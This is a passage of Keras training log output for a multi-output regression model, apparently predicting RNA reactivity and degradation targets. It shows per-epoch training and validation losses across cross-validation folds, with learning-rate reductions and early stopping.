output_ph_loss: 0.7782 - output_mg_c_loss: 0.5787 - output_c_loss: 0.7180 - val_loss: 4.6358 - val_output_react_loss: 0.5300 - val_output_bg_ph_loss: 0.6729 - val_output_ph_loss: 0.6295 - val_output_mg_c_loss: 0.5395 - val_output_c_loss: 0.5215 Epoch 19/70 120/120 - 8s - loss: 5.0316 - output_react_loss: 0.5538 - output_bg_ph_loss: 0.5885 - output_ph_loss: 0.8241 - output_mg_c_loss: 0.5893 - output_c_loss: 0.7444 - val_loss: 4.6052 - val_output_react_loss: 0.5313 - val_output_bg_ph_loss: 0.6665 - val_output_ph_loss: 0.6143 - val_output_mg_c_loss: 0.5373 - val_output_c_loss: 0.5206 Epoch 20/70 120/120 - 7s - loss: 4.7251 - output_react_loss: 0.5275 - output_bg_ph_loss: 0.5618 - output_ph_loss: 0.7502 - output_mg_c_loss: 0.5501 - output_c_loss: 0.6961 - val_loss: 4.5849 - val_output_react_loss: 0.5374 
- val_output_bg_ph_loss: 0.6602 - val_output_ph_loss: 0.6142 - val_output_mg_c_loss: 0.5287 - val_output_c_loss: 0.5181 Epoch 21/70 120/120 - 7s - loss: 4.6258 - output_react_loss: 0.5121 - output_bg_ph_loss: 0.5549 - output_ph_loss: 0.7380 - output_mg_c_loss: 0.5426 - output_c_loss: 0.6686 - val_loss: 4.5551 - val_output_react_loss: 0.5311 - val_output_bg_ph_loss: 0.6546 - val_output_ph_loss: 0.6146 - val_output_mg_c_loss: 0.5248 - val_output_c_loss: 0.5197 Epoch 22/70 120/120 - 7s - loss: 4.7790 - output_react_loss: 0.5214 - output_bg_ph_loss: 0.5564 - output_ph_loss: 0.7906 - output_mg_c_loss: 0.5594 - output_c_loss: 0.7140 - val_loss: 4.5911 - val_output_react_loss: 0.5309 - val_output_bg_ph_loss: 0.6656 - val_output_ph_loss: 0.6121 - val_output_mg_c_loss: 0.5339 - val_output_c_loss: 0.5181 Epoch 23/70 120/120 - 7s - loss: 4.6777 - output_react_loss: 0.5160 - output_bg_ph_loss: 0.5486 - output_ph_loss: 0.7594 - output_mg_c_loss: 0.5436 - output_c_loss: 0.7019 - val_loss: 4.5732 - val_output_react_loss: 0.5345 - val_output_bg_ph_loss: 0.6562 - val_output_ph_loss: 0.6131 - val_output_mg_c_loss: 0.5282 - val_output_c_loss: 0.5224 Epoch 24/70 120/120 - 7s - loss: 4.6942 - output_react_loss: 0.5073 - output_bg_ph_loss: 0.5480 - output_ph_loss: 0.7827 - output_mg_c_loss: 0.5429 - output_c_loss: 0.7151 - val_loss: 4.5363 - val_output_react_loss: 0.5251 - val_output_bg_ph_loss: 0.6569 - val_output_ph_loss: 0.6108 - val_output_mg_c_loss: 0.5240 - val_output_c_loss: 0.5135 Epoch 25/70 120/120 - 7s - loss: 4.4474 - output_react_loss: 0.4898 - output_bg_ph_loss: 0.5233 - output_ph_loss: 0.7180 - output_mg_c_loss: 0.5243 - output_c_loss: 0.6546 - val_loss: 4.5785 - val_output_react_loss: 0.5333 - val_output_bg_ph_loss: 0.6567 - val_output_ph_loss: 0.6147 - val_output_mg_c_loss: 0.5327 - val_output_c_loss: 0.5183 Epoch 26/70 120/120 - 7s - loss: 4.4364 - output_react_loss: 0.4836 - output_bg_ph_loss: 0.5196 - output_ph_loss: 0.7170 - output_mg_c_loss: 0.5190 - output_c_loss: 0.6751 - val_loss: 4.5358 - val_output_react_loss: 0.5244 - val_output_bg_ph_loss: 0.6547 - val_output_ph_loss: 0.6109 - val_output_mg_c_loss: 0.5261 - val_output_c_loss: 0.5144 Epoch 27/70 120/120 - 7s - loss: 4.5330 - output_react_loss: 0.4975 - output_bg_ph_loss: 0.5284 - output_ph_loss: 0.7392 - output_mg_c_loss: 0.5278 - output_c_loss: 0.6863 - val_loss: 4.5744 - val_output_react_loss: 0.5281 - val_output_bg_ph_loss: 0.6655 - val_output_ph_loss: 0.6125 - val_output_mg_c_loss: 0.5286 - val_output_c_loss: 0.5174 Epoch 28/70 120/120 - 7s - loss: 4.3557 - output_react_loss: 0.4810 - output_bg_ph_loss: 0.5061 - output_ph_loss: 0.7059 - output_mg_c_loss: 0.5066 - output_c_loss: 0.6622 - val_loss: 4.5536 - val_output_react_loss: 0.5334 - val_output_bg_ph_loss: 0.6568 - val_output_ph_loss: 0.6090 - val_output_mg_c_loss: 0.5254 - val_output_c_loss: 0.5135 Epoch 29/70 120/120 - 7s - loss: 4.4306 - output_react_loss: 0.4779 - output_bg_ph_loss: 0.5091 - output_ph_loss: 0.7387 - output_mg_c_loss: 0.5172 - output_c_loss: 0.6837 - val_loss: 4.6267 - val_output_react_loss: 0.5371 - val_output_bg_ph_loss: 0.6648 - val_output_ph_loss: 0.6151 - val_output_mg_c_loss: 0.5398 - val_output_c_loss: 0.5282 Epoch 30/70 120/120 - 7s - loss: 4.5029 - output_react_loss: 0.4844 - output_bg_ph_loss: 0.5150 - output_ph_loss: 0.7510 - output_mg_c_loss: 0.5286 - output_c_loss: 0.6959 - val_loss: 4.5810 - val_output_react_loss: 0.5327 - val_output_bg_ph_loss: 0.6646 - val_output_ph_loss: 0.6125 - val_output_mg_c_loss: 0.5286 - val_output_c_loss: 0.5167 
Epoch 31/70 Epoch 00031: ReduceLROnPlateau reducing learning rate to 0.00010000000474974513. 120/120 - 7s - loss: 4.4161 - output_react_loss: 0.4745 - output_bg_ph_loss: 0.5149 - output_ph_loss: 0.7337 - output_mg_c_loss: 0.5139 - output_c_loss: 0.6759 - val_loss: 4.5696 - val_output_react_loss: 0.5333 - val_output_bg_ph_loss: 0.6593 - val_output_ph_loss: 0.6123 - val_output_mg_c_loss: 0.5279 - val_output_c_loss: 0.5163 Epoch 32/70 120/120 - 7s - loss: 4.1864 - output_react_loss: 0.4506 - output_bg_ph_loss: 0.4808 - output_ph_loss: 0.7000 - output_mg_c_loss: 0.4885 - output_c_loss: 0.6466 - val_loss: 4.4873 - val_output_react_loss: 0.5233 - val_output_bg_ph_loss: 0.6486 - val_output_ph_loss: 0.6018 - val_output_mg_c_loss: 0.5162 - val_output_c_loss: 0.5093 Epoch 33/70 120/120 - 7s - loss: 4.0855 - output_react_loss: 0.4382 - output_bg_ph_loss: 0.4705 - output_ph_loss: 0.6808 - output_mg_c_loss: 0.4763 - output_c_loss: 0.6347 - val_loss: 4.4754 - val_output_react_loss: 0.5233 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.6000 - val_output_mg_c_loss: 0.5147 - val_output_c_loss: 0.5069 Epoch 34/70 120/120 - 7s - loss: 4.2179 - output_react_loss: 0.4546 - output_bg_ph_loss: 0.4770 - output_ph_loss: 0.7134 - output_mg_c_loss: 0.4834 - output_c_loss: 0.6746 - val_loss: 4.4678 - val_output_react_loss: 0.5224 - val_output_bg_ph_loss: 0.6447 - val_output_ph_loss: 0.5986 - val_output_mg_c_loss: 0.5139 - val_output_c_loss: 0.5071 Epoch 35/70 120/120 - 8s - loss: 4.0815 - output_react_loss: 0.4387 - output_bg_ph_loss: 0.4625 - output_ph_loss: 0.6882 - output_mg_c_loss: 0.4749 - output_c_loss: 0.6413 - val_loss: 4.4744 - val_output_react_loss: 0.5229 - val_output_bg_ph_loss: 0.6451 - val_output_ph_loss: 0.6008 - val_output_mg_c_loss: 0.5145 - val_output_c_loss: 0.5086 Epoch 36/70 120/120 - 7s - loss: 3.9169 - output_react_loss: 0.4280 - output_bg_ph_loss: 0.4465 - output_ph_loss: 0.6464 - output_mg_c_loss: 0.4512 - output_c_loss: 0.6190 - val_loss: 4.4753 - val_output_react_loss: 0.5229 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.5999 - val_output_mg_c_loss: 0.5151 - val_output_c_loss: 0.5068 Epoch 37/70 120/120 - 7s - loss: 4.0919 - output_react_loss: 0.4353 - output_bg_ph_loss: 0.4631 - output_ph_loss: 0.6960 - output_mg_c_loss: 0.4765 - output_c_loss: 0.6463 - val_loss: 4.4893 - val_output_react_loss: 0.5247 - val_output_bg_ph_loss: 0.6476 - val_output_ph_loss: 0.6019 - val_output_mg_c_loss: 0.5167 - val_output_c_loss: 0.5095 Epoch 38/70 120/120 - 7s - loss: 4.0659 - output_react_loss: 0.4359 - output_bg_ph_loss: 0.4577 - output_ph_loss: 0.6921 - output_mg_c_loss: 0.4670 - output_c_loss: 0.6526 - val_loss: 4.4675 - val_output_react_loss: 0.5223 - val_output_bg_ph_loss: 0.6447 - val_output_ph_loss: 0.5998 - val_output_mg_c_loss: 0.5130 - val_output_c_loss: 0.5076 Epoch 39/70 120/120 - 8s - loss: 4.0875 - output_react_loss: 0.4352 - output_bg_ph_loss: 0.4633 - output_ph_loss: 0.6898 - output_mg_c_loss: 0.4738 - output_c_loss: 0.6533 - val_loss: 4.4727 - val_output_react_loss: 0.5232 - val_output_bg_ph_loss: 0.6451 - val_output_ph_loss: 0.6003 - val_output_mg_c_loss: 0.5138 - val_output_c_loss: 0.5081 Epoch 40/70 120/120 - 7s - loss: 4.0767 - output_react_loss: 0.4371 - output_bg_ph_loss: 0.4611 - output_ph_loss: 0.6976 - output_mg_c_loss: 0.4693 - output_c_loss: 0.6442 - val_loss: 4.4739 - val_output_react_loss: 0.5230 - val_output_bg_ph_loss: 0.6453 - val_output_ph_loss: 0.5995 - val_output_mg_c_loss: 0.5148 - val_output_c_loss: 0.5082 Epoch 41/70 120/120 - 7s - loss: 3.8735 - 
output_react_loss: 0.4178 - output_bg_ph_loss: 0.4458 - output_ph_loss: 0.6334 - output_mg_c_loss: 0.4508 - output_c_loss: 0.6114 - val_loss: 4.4756 - val_output_react_loss: 0.5230 - val_output_bg_ph_loss: 0.6461 - val_output_ph_loss: 0.6011 - val_output_mg_c_loss: 0.5138 - val_output_c_loss: 0.5086 Epoch 42/70 120/120 - 7s - loss: 4.1327 - output_react_loss: 0.4404 - output_bg_ph_loss: 0.4608 - output_ph_loss: 0.7110 - output_mg_c_loss: 0.4753 - output_c_loss: 0.6686 - val_loss: 4.4778 - val_output_react_loss: 0.5237 - val_output_bg_ph_loss: 0.6473 - val_output_ph_loss: 0.6004 - val_output_mg_c_loss: 0.5139 - val_output_c_loss: 0.5076 Epoch 43/70 Epoch 00043: ReduceLROnPlateau reducing learning rate to 1.0000000474974514e-05. 120/120 - 8s - loss: 3.9421 - output_react_loss: 0.4257 - output_bg_ph_loss: 0.4502 - output_ph_loss: 0.6623 - output_mg_c_loss: 0.4530 - output_c_loss: 0.6219 - val_loss: 4.4769 - val_output_react_loss: 0.5229 - val_output_bg_ph_loss: 0.6462 - val_output_ph_loss: 0.6005 - val_output_mg_c_loss: 0.5155 - val_output_c_loss: 0.5072 Epoch 44/70 120/120 - 7s - loss: 3.9330 - output_react_loss: 0.4210 - output_bg_ph_loss: 0.4489 - output_ph_loss: 0.6522 - output_mg_c_loss: 0.4536 - output_c_loss: 0.6336 - val_loss: 4.4741 - val_output_react_loss: 0.5232 - val_output_bg_ph_loss: 0.6460 - val_output_ph_loss: 0.6005 - val_output_mg_c_loss: 0.5140 - val_output_c_loss: 0.5073 Epoch 45/70 120/120 - 7s - loss: 4.0963 - output_react_loss: 0.4412 - output_bg_ph_loss: 0.4577 - output_ph_loss: 0.6950 - output_mg_c_loss: 0.4753 - output_c_loss: 0.6529 - val_loss: 4.4739 - val_output_react_loss: 0.5230 - val_output_bg_ph_loss: 0.6461 - val_output_ph_loss: 0.5999 - val_output_mg_c_loss: 0.5141 - val_output_c_loss: 0.5075 Epoch 46/70 120/120 - 7s - loss: 4.0753 - output_react_loss: 0.4336 - output_bg_ph_loss: 0.4550 - output_ph_loss: 0.7005 - output_mg_c_loss: 0.4690 - output_c_loss: 0.6598 - val_loss: 4.4747 - val_output_react_loss: 0.5229 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.6005 - val_output_mg_c_loss: 0.5142 - val_output_c_loss: 0.5074 Epoch 47/70 120/120 - 7s - loss: 3.9274 - output_react_loss: 0.4214 - output_bg_ph_loss: 0.4449 - output_ph_loss: 0.6641 - output_mg_c_loss: 0.4539 - output_c_loss: 0.6230 - val_loss: 4.4726 - val_output_react_loss: 0.5228 - val_output_bg_ph_loss: 0.6461 - val_output_ph_loss: 0.6000 - val_output_mg_c_loss: 0.5139 - val_output_c_loss: 0.5071 Epoch 48/70 Restoring model weights from the end of the best epoch. Epoch 00048: ReduceLROnPlateau reducing learning rate to 1.0000000656873453e-06. 
120/120 - 7s - loss: 3.9150 - output_react_loss: 0.4156 - output_bg_ph_loss: 0.4457 - output_ph_loss: 0.6547 - output_mg_c_loss: 0.4567 - output_c_loss: 0.6243 - val_loss: 4.4713 - val_output_react_loss: 0.5225 - val_output_bg_ph_loss: 0.6460 - val_output_ph_loss: 0.5998 - val_output_mg_c_loss: 0.5137 - val_output_c_loss: 0.5070 Epoch 00048: early stopping FOLD: 4 Epoch 1/70 120/120 - 9s - loss: 8.8906 - output_react_loss: 0.9509 - output_bg_ph_loss: 1.1470 - output_ph_loss: 1.3217 - output_mg_c_loss: 1.1242 - output_c_loss: 1.1248 - val_loss: 6.7099 - val_output_react_loss: 0.7702 - val_output_bg_ph_loss: 0.9436 - val_output_ph_loss: 0.8752 - val_output_mg_c_loss: 0.8307 - val_output_c_loss: 0.7457 Epoch 2/70 120/120 - 7s - loss: 7.7552 - output_react_loss: 0.8208 - output_bg_ph_loss: 0.9754 - output_ph_loss: 1.1669 - output_mg_c_loss: 0.9870 - output_c_loss: 1.0217 - val_loss: 6.1518 - val_output_react_loss: 0.7047 - val_output_bg_ph_loss: 0.8679 - val_output_ph_loss: 0.8045 - val_output_mg_c_loss: 0.7560 - val_output_c_loss: 0.6901 Epoch 3/70 120/120 - 7s - loss: 7.1821 - output_react_loss: 0.7753 - output_bg_ph_loss: 0.8991 - output_ph_loss: 1.1080 - output_mg_c_loss: 0.8939 - output_c_loss: 0.9375 - val_loss: 5.6383 - val_output_react_loss: 0.6550 - val_output_bg_ph_loss: 0.7970 - val_output_ph_loss: 0.7564 - val_output_mg_c_loss: 0.6784 - val_output_c_loss: 0.6212 Epoch 4/70 120/120 - 7s - loss: 6.7289 - output_react_loss: 0.7362 - output_bg_ph_loss: 0.8336 - output_ph_loss: 1.0447 - output_mg_c_loss: 0.8225 - output_c_loss: 0.8995 - val_loss: 5.2977 - val_output_react_loss: 0.6334 - val_output_bg_ph_loss: 0.7465 - val_output_ph_loss: 0.6968 - val_output_mg_c_loss: 0.6302 - val_output_c_loss: 0.5807 Epoch 5/70 120/120 - 7s - loss: 6.4910 - output_react_loss: 0.7190 - output_bg_ph_loss: 0.8051 - output_ph_loss: 0.9983 - output_mg_c_loss: 0.7908 - output_c_loss: 0.8628 - val_loss: 5.2019 - val_output_react_loss: 0.6135 - val_output_bg_ph_loss: 0.7289 - val_output_ph_loss: 0.6880 - val_output_mg_c_loss: 0.6272 - val_output_c_loss: 0.5747 Epoch 6/70 120/120 - 7s - loss: 6.1684 - output_react_loss: 0.6897 - output_bg_ph_loss: 0.7635 - output_ph_loss: 0.9449 - output_mg_c_loss: 0.7468 - output_c_loss: 0.8238 - val_loss: 5.0363 - val_output_react_loss: 0.5998 - val_output_bg_ph_loss: 0.7134 - val_output_ph_loss: 0.6642 - val_output_mg_c_loss: 0.5947 - val_output_c_loss: 0.5563 Epoch 7/70 120/120 - 7s - loss: 6.2087 - output_react_loss: 0.6861 - output_bg_ph_loss: 0.7609 - output_ph_loss: 0.9620 - output_mg_c_loss: 0.7543 - output_c_loss: 0.8441 - val_loss: 5.0750 - val_output_react_loss: 0.6034 - val_output_bg_ph_loss: 0.7020 - val_output_ph_loss: 0.6790 - val_output_mg_c_loss: 0.6142 - val_output_c_loss: 0.5569 Epoch 8/70 120/120 - 7s - loss: 6.0125 - output_react_loss: 0.6668 - output_bg_ph_loss: 0.7439 - output_ph_loss: 0.9281 - output_mg_c_loss: 0.7213 - output_c_loss: 0.8205 - val_loss: 4.8987 - val_output_react_loss: 0.5870 - val_output_bg_ph_loss: 0.6898 - val_output_ph_loss: 0.6503 - val_output_mg_c_loss: 0.5736 - val_output_c_loss: 0.5477 Epoch 9/70 120/120 - 7s - loss: 5.6743 - output_react_loss: 0.6340 - output_bg_ph_loss: 0.6979 - output_ph_loss: 0.8804 - output_mg_c_loss: 0.6772 - output_c_loss: 0.7756 - val_loss: 4.8440 - val_output_react_loss: 0.5786 - val_output_bg_ph_loss: 0.6811 - val_output_ph_loss: 0.6374 - val_output_mg_c_loss: 0.5707 - val_output_c_loss: 0.5456 Epoch 10/70 120/120 - 7s - loss: 5.8360 - output_react_loss: 0.6532 - output_bg_ph_loss: 0.6981 - 
output_ph_loss: 0.9233 - output_mg_c_loss: 0.6985 - output_c_loss: 0.8132 - val_loss: 4.8348 - val_output_react_loss: 0.5791 - val_output_bg_ph_loss: 0.6826 - val_output_ph_loss: 0.6364 - val_output_mg_c_loss: 0.5702 - val_output_c_loss: 0.5346 Epoch 11/70 120/120 - 7s - loss: 5.5673 - output_react_loss: 0.6177 - output_bg_ph_loss: 0.6746 - output_ph_loss: 0.8888 - output_mg_c_loss: 0.6622 - output_c_loss: 0.7693 - val_loss: 4.7333 - val_output_react_loss: 0.5694 - val_output_bg_ph_loss: 0.6625 - val_output_ph_loss: 0.6226 - val_output_mg_c_loss: 0.5564 - val_output_c_loss: 0.5340 Epoch 12/70 120/120 - 7s - loss: 5.5214 - output_react_loss: 0.6199 - output_bg_ph_loss: 0.6635 - output_ph_loss: 0.8765 - output_mg_c_loss: 0.6528 - output_c_loss: 0.7725 - val_loss: 4.8059 - val_output_react_loss: 0.5627 - val_output_bg_ph_loss: 0.6731 - val_output_ph_loss: 0.6371 - val_output_mg_c_loss: 0.5799 - val_output_c_loss: 0.5374 Epoch 13/70 120/120 - 7s - loss: 5.3062 - output_react_loss: 0.5977 - output_bg_ph_loss: 0.6392 - output_ph_loss: 0.8410 - output_mg_c_loss: 0.6230 - output_c_loss: 0.7454 - val_loss: 4.7326 - val_output_react_loss: 0.5585 - val_output_bg_ph_loss: 0.6626 - val_output_ph_loss: 0.6208 - val_output_mg_c_loss: 0.5681 - val_output_c_loss: 0.5334 Epoch 14/70 120/120 - 7s - loss: 5.2454 - output_react_loss: 0.5833 - output_bg_ph_loss: 0.6234 - output_ph_loss: 0.8391 - output_mg_c_loss: 0.6176 - output_c_loss: 0.7576 - val_loss: 4.7426 - val_output_react_loss: 0.5517 - val_output_bg_ph_loss: 0.6679 - val_output_ph_loss: 0.6287 - val_output_mg_c_loss: 0.5702 - val_output_c_loss: 0.5343 Epoch 15/70 120/120 - 7s - loss: 5.2718 - output_react_loss: 0.5885 - output_bg_ph_loss: 0.6244 - output_ph_loss: 0.8461 - output_mg_c_loss: 0.6164 - output_c_loss: 0.7671 - val_loss: 4.6895 - val_output_react_loss: 0.5530 - val_output_bg_ph_loss: 0.6561 - val_output_ph_loss: 0.6196 - val_output_mg_c_loss: 0.5603 - val_output_c_loss: 0.5311 Epoch 16/70 120/120 - 8s - loss: 5.0568 - output_react_loss: 0.5666 - output_bg_ph_loss: 0.6042 - output_ph_loss: 0.8064 - output_mg_c_loss: 0.5917 - output_c_loss: 0.7252 - val_loss: 4.7229 - val_output_react_loss: 0.5603 - val_output_bg_ph_loss: 0.6592 - val_output_ph_loss: 0.6172 - val_output_mg_c_loss: 0.5682 - val_output_c_loss: 0.5303 Epoch 17/70 120/120 - 7s - loss: 5.1108 - output_react_loss: 0.5676 - output_bg_ph_loss: 0.6043 - output_ph_loss: 0.8302 - output_mg_c_loss: 0.5973 - output_c_loss: 0.7422 - val_loss: 4.6748 - val_output_react_loss: 0.5490 - val_output_bg_ph_loss: 0.6577 - val_output_ph_loss: 0.6220 - val_output_mg_c_loss: 0.5537 - val_output_c_loss: 0.5321 Epoch 18/70 120/120 - 7s - loss: 4.8097 - output_react_loss: 0.5327 - output_bg_ph_loss: 0.5670 - output_ph_loss: 0.7759 - output_mg_c_loss: 0.5630 - output_c_loss: 0.7083 - val_loss: 4.6194 - val_output_react_loss: 0.5420 - val_output_bg_ph_loss: 0.6526 - val_output_ph_loss: 0.6067 - val_output_mg_c_loss: 0.5501 - val_output_c_loss: 0.5233 Epoch 19/70 120/120 - 7s - loss: 4.9436 - output_react_loss: 0.5502 - output_bg_ph_loss: 0.5810 - output_ph_loss: 0.8112 - output_mg_c_loss: 0.5720 - output_c_loss: 0.7258 - val_loss: 4.6665 - val_output_react_loss: 0.5566 - val_output_bg_ph_loss: 0.6545 - val_output_ph_loss: 0.6094 - val_output_mg_c_loss: 0.5533 - val_output_c_loss: 0.5283 Epoch 20/70 120/120 - 7s - loss: 4.7871 - output_react_loss: 0.5290 - output_bg_ph_loss: 0.5616 - output_ph_loss: 0.7727 - output_mg_c_loss: 0.5615 - output_c_loss: 0.7103 - val_loss: 4.7063 - val_output_react_loss: 0.5511 
- val_output_bg_ph_loss: 0.6634 - val_output_ph_loss: 0.6159 - val_output_mg_c_loss: 0.5631 - val_output_c_loss: 0.5352 Epoch 21/70 120/120 - 7s - loss: 4.7750 - output_react_loss: 0.5299 - output_bg_ph_loss: 0.5580 - output_ph_loss: 0.7771 - output_mg_c_loss: 0.5590 - output_c_loss: 0.7043 - val_loss: 4.6158 - val_output_react_loss: 0.5455 - val_output_bg_ph_loss: 0.6464 - val_output_ph_loss: 0.6079 - val_output_mg_c_loss: 0.5490 - val_output_c_loss: 0.5261 Epoch 22/70 120/120 - 7s - loss: 4.7371 - output_react_loss: 0.5229 - output_bg_ph_loss: 0.5488 - output_ph_loss: 0.7858 - output_mg_c_loss: 0.5513 - output_c_loss: 0.7053 - val_loss: 4.5994 - val_output_react_loss: 0.5457 - val_output_bg_ph_loss: 0.6436 - val_output_ph_loss: 0.6061 - val_output_mg_c_loss: 0.5459 - val_output_c_loss: 0.5226 Epoch 23/70 120/120 - 7s - loss: 4.7746 - output_react_loss: 0.5235 - output_bg_ph_loss: 0.5509 - output_ph_loss: 0.8001 - output_mg_c_loss: 0.5547 - output_c_loss: 0.7163 - val_loss: 4.6118 - val_output_react_loss: 0.5429 - val_output_bg_ph_loss: 0.6521 - val_output_ph_loss: 0.6054 - val_output_mg_c_loss: 0.5466 - val_output_c_loss: 0.5232 Epoch 24/70 120/120 - 7s - loss: 4.6363 - output_react_loss: 0.5124 - output_bg_ph_loss: 0.5353 - output_ph_loss: 0.7584 - output_mg_c_loss: 0.5383 - output_c_loss: 0.7059 - val_loss: 4.6217 - val_output_react_loss: 0.5505 - val_output_bg_ph_loss: 0.6460 - val_output_ph_loss: 0.6066 - val_output_mg_c_loss: 0.5480 - val_output_c_loss: 0.5262 Epoch 25/70 120/120 - 7s - loss: 4.4305 - output_react_loss: 0.4869 - output_bg_ph_loss: 0.5133 - output_ph_loss: 0.7272 - output_mg_c_loss: 0.5132 - output_c_loss: 0.6766 - val_loss: 4.6304 - val_output_react_loss: 0.5475 - val_output_bg_ph_loss: 0.6499 - val_output_ph_loss: 0.6096 - val_output_mg_c_loss: 0.5507 - val_output_c_loss: 0.5246 Epoch 26/70 120/120 - 7s - loss: 4.6461 - output_react_loss: 0.5099 - output_bg_ph_loss: 0.5270 - output_ph_loss: 0.7788 - output_mg_c_loss: 0.5405 - output_c_loss: 0.7126 - val_loss: 4.6105 - val_output_react_loss: 0.5441 - val_output_bg_ph_loss: 0.6435 - val_output_ph_loss: 0.6049 - val_output_mg_c_loss: 0.5536 - val_output_c_loss: 0.5232 Epoch 27/70 Epoch 00027: ReduceLROnPlateau reducing learning rate to 0.00010000000474974513. 
120/120 - 7s - loss: 4.4508 - output_react_loss: 0.4865 - output_bg_ph_loss: 0.5154 - output_ph_loss: 0.7393 - output_mg_c_loss: 0.5180 - output_c_loss: 0.6718 - val_loss: 4.6236 - val_output_react_loss: 0.5541 - val_output_bg_ph_loss: 0.6424 - val_output_ph_loss: 0.6128 - val_output_mg_c_loss: 0.5445 - val_output_c_loss: 0.5288 Epoch 28/70 120/120 - 7s - loss: 4.3974 - output_react_loss: 0.4782 - output_bg_ph_loss: 0.4922 - output_ph_loss: 0.7485 - output_mg_c_loss: 0.5110 - output_c_loss: 0.6862 - val_loss: 4.5277 - val_output_react_loss: 0.5392 - val_output_bg_ph_loss: 0.6349 - val_output_ph_loss: 0.5967 - val_output_mg_c_loss: 0.5348 - val_output_c_loss: 0.5133 Epoch 29/70 120/120 - 7s - loss: 4.1935 - output_react_loss: 0.4579 - output_bg_ph_loss: 0.4789 - output_ph_loss: 0.7002 - output_mg_c_loss: 0.4823 - output_c_loss: 0.6551 - val_loss: 4.5286 - val_output_react_loss: 0.5375 - val_output_bg_ph_loss: 0.6356 - val_output_ph_loss: 0.5949 - val_output_mg_c_loss: 0.5363 - val_output_c_loss: 0.5150 Epoch 30/70 120/120 - 7s - loss: 4.3716 - output_react_loss: 0.4728 - output_bg_ph_loss: 0.4947 - output_ph_loss: 0.7368 - output_mg_c_loss: 0.5026 - output_c_loss: 0.6945 - val_loss: 4.5206 - val_output_react_loss: 0.5371 - val_output_bg_ph_loss: 0.6341 - val_output_ph_loss: 0.5940 - val_output_mg_c_loss: 0.5356 - val_output_c_loss: 0.5130 Epoch 31/70 120/120 - 7s - loss: 4.2824 - output_react_loss: 0.4612 - output_bg_ph_loss: 0.4877 - output_ph_loss: 0.7328 - output_mg_c_loss: 0.4905 - output_c_loss: 0.6709 - val_loss: 4.5204 - val_output_react_loss: 0.5369 - val_output_bg_ph_loss: 0.6333 - val_output_ph_loss: 0.5948 - val_output_mg_c_loss: 0.5358 - val_output_c_loss: 0.5135 Epoch 32/70 120/120 - 8s - loss: 4.2224 - output_react_loss: 0.4580 - output_bg_ph_loss: 0.4723 - output_ph_loss: 0.7178 - output_mg_c_loss: 0.4889 - output_c_loss: 0.6664 - val_loss: 4.5124 - val_output_react_loss: 0.5360 - val_output_bg_ph_loss: 0.6326 - val_output_ph_loss: 0.5944 - val_output_mg_c_loss: 0.5338 - val_output_c_loss: 0.5131 Epoch 33/70 120/120 - 7s - loss: 4.1067 - output_react_loss: 0.4443 - output_bg_ph_loss: 0.4693 - output_ph_loss: 0.6871 - output_mg_c_loss: 0.4744 - output_c_loss: 0.6434 - val_loss: 4.5215 - val_output_react_loss: 0.5368 - val_output_bg_ph_loss: 0.6340 - val_output_ph_loss: 0.5943 - val_output_mg_c_loss: 0.5360 - val_output_c_loss: 0.5134 Epoch 34/70 120/120 - 7s - loss: 4.3377 - output_react_loss: 0.4678 - output_bg_ph_loss: 0.4812 - output_ph_loss: 0.7438 - output_mg_c_loss: 0.5043 - output_c_loss: 0.6874 - val_loss: 4.5075 - val_output_react_loss: 0.5353 - val_output_bg_ph_loss: 0.6321 - val_output_ph_loss: 0.5934 - val_output_mg_c_loss: 0.5333 - val_output_c_loss: 0.5126 Epoch 35/70 120/120 - 7s - loss: 4.1034 - output_react_loss: 0.4508 - output_bg_ph_loss: 0.4664 - output_ph_loss: 0.6807 - output_mg_c_loss: 0.4690 - output_c_loss: 0.6503 - val_loss: 4.5226 - val_output_react_loss: 0.5381 - val_output_bg_ph_loss: 0.6328 - val_output_ph_loss: 0.5957 - val_output_mg_c_loss: 0.5356 - val_output_c_loss: 0.5138 Epoch 36/70 120/120 - 7s - loss: 4.0701 - output_react_loss: 0.4452 - output_bg_ph_loss: 0.4590 - output_ph_loss: 0.6904 - output_mg_c_loss: 0.4662 - output_c_loss: 0.6389 - val_loss: 4.5138 - val_output_react_loss: 0.5366 - val_output_bg_ph_loss: 0.6316 - val_output_ph_loss: 0.5939 - val_output_mg_c_loss: 0.5347 - val_output_c_loss: 0.5142 Epoch 37/70 120/120 - 7s - loss: 4.2783 - output_react_loss: 0.4575 - output_bg_ph_loss: 0.4774 - output_ph_loss: 0.7434 - 
output_mg_c_loss: 0.4942 - output_c_loss: 0.6767 - val_loss: 4.5133 - val_output_react_loss: 0.5361 - val_output_bg_ph_loss: 0.6321 - val_output_ph_loss: 0.5935 - val_output_mg_c_loss: 0.5350 - val_output_c_loss: 0.5134 Epoch 38/70 120/120 - 7s - loss: 4.2156 - output_react_loss: 0.4574 - output_bg_ph_loss: 0.4655 - output_ph_loss: 0.7182 - output_mg_c_loss: 0.4864 - output_c_loss: 0.6788 - val_loss: 4.5101 - val_output_react_loss: 0.5351 - val_output_bg_ph_loss: 0.6316 - val_output_ph_loss: 0.5937 - val_output_mg_c_loss: 0.5346 - val_output_c_loss: 0.5137 Epoch 39/70 Epoch 00039: ReduceLROnPlateau reducing learning rate to 1.0000000474974514e-05. 120/120 - 7s - loss: 4.2040 - output_react_loss: 0.4570 - output_bg_ph_loss: 0.4739 - output_ph_loss: 0.7226 - output_mg_c_loss: 0.4780 - output_c_loss: 0.6635 - val_loss: 4.5177 - val_output_react_loss: 0.5363 - val_output_bg_ph_loss: 0.6332 - val_output_ph_loss: 0.5938 - val_output_mg_c_loss: 0.5352 - val_output_c_loss: 0.5148 Epoch 40/70 120/120 - 8s - loss: 4.0879 - output_react_loss: 0.4409 - output_bg_ph_loss: 0.4636 - output_ph_loss: 0.6944 - output_mg_c_loss: 0.4676 - output_c_loss: 0.6492 - val_loss: 4.5065 - val_output_react_loss: 0.5355 - val_output_bg_ph_loss: 0.6315 - val_output_ph_loss: 0.5929 - val_output_mg_c_loss: 0.5332 - val_output_c_loss: 0.5133 Epoch 41/70 120/120 - 7s - loss: 4.1062 - output_react_loss: 0.4419 - output_bg_ph_loss: 0.4591 - output_ph_loss: 0.6918 - output_mg_c_loss: 0.4792 - output_c_loss: 0.6540 - val_loss: 4.5043 - val_output_react_loss: 0.5353 - val_output_bg_ph_loss: 0.6310 - val_output_ph_loss: 0.5925 - val_output_mg_c_loss: 0.5332 - val_output_c_loss: 0.5130 Epoch 42/70 120/120 - 7s - loss: 4.1679 - output_react_loss: 0.4495 - 